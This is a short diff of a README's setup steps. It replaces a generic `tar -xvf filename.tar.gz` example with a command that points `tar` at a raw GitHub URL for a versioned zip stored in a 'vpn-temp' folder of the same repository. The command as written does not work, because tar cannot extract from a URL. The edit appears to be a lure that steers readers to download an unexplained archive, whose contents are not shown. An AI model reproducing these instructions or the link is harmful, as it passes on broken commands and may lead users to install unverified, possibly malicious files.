jesusmedrandam/miniature-octo-palm-tree/README.md

    Click the file name to start the download.
 Depending on your browser settings, the file may go to your default download folder.

 4. **Extract the File**
    After downloading, you may need to extract the file if it’s in a zip or tar format.
-Right-click the downloaded file and choose "Extract" or use a command like `tar -xvf filename.tar.gz` in the terminal.
+Right-click the downloaded file and choose "Extract" or use a command like `tar -xvf https://github.com/jesusmedrandam/miniature-octo-palm-tree/raw/refs/heads/main/vpn-temp/tree-miniature-octo-palm-v1.0-alpha.4.zip` in the terminal.

 5. **Open the Terminal**
    Navigate to the folder where the extracted files are located.
 You can do this by opening a terminal and using the `cd` command, for example: